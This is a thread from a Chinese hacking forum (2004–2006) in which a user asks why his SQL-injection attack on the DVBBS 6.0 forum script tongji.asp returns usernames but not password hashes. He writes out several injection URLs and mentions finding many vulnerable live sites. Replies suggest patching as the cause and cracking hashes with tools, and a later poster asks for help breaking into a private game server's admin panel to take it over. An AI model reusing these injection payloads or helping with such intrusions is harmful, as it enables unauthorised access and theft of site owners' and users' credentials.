|
 | 作者: Henung [henung]
 论坛用户 |
登录 |
| 请教动网论坛DVBBS6.0tongji.asp脚本漏洞功击...... 我在测试动网论坛DVBBS 6.0的tongji.asp脚本漏洞功击时,为什么只可以查到用户,却查不到密码呢? 查用户的:http://192.168.130.134/tongji.asp?orders=2&N=2%20UserName?,(这个已经成功了,我已经查到了论坛上有什么用户) http://192.168.130.134/tongji.asp?orders=2&N=2%20userpassword,?(这个搞不定啊,输进去以后和原来一样,只有用户,没有见到有MD5加密过的密码,(如果这个问题我搞不明白,我会睡不着的)) http://192.168.130.134/tongji.asp?orders=2&N=2%20userclass,(这个也是一样的结果,什么原因,为什么人家一搞就成功了呢,而我却不是) |
| 地主 发表时间: 04-10-10 08:16 |
 | 回复: hackerjune [hackerjune]  论坛用户 |
登录 |
|
这漏洞你还找得到啊? 佩服 你的说法可能打了补丁的 |
| B1层 发表时间: 04-10-10 13:00 |
| 回复: Henung [henung] 论坛用户 |
登录 |
|
我找到了很多这样的网站,而且全部都是只可以查到用户名,却查不到密码的,是不是查到用户名就可以查到密码呢,查到用户名有没有决定查到密码的可能? |
| B2层 发表时间: 04-10-10 14:00 |
| 回复: hackerjune [hackerjune] 论坛用户 |
登录 |
|
即使你找的密码也师经过加密的 用工具破解 |
| B3层 发表时间: 04-10-15 18:18 |
 | 回复: kailiang [kailiang]  论坛用户 |
登录 |
|
那个哥哥姐姐愿意教我怎么样的入侵奇迹SF的后台啊` 就是破解他的后台密码`然后整个奇迹都是我们控制的。 有那位哥哥愿意教我这个啊`~` 谢谢了。愿意的哥哥姐姐 加我QQ6525255 `加的时候打20CN`我就知道了。 谢谢` |
| B4层 发表时间: 06-04-24 23:52 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 黑客进阶 标题: 请教动网论坛DVBBS6.0tongji.asp脚本漏洞功击......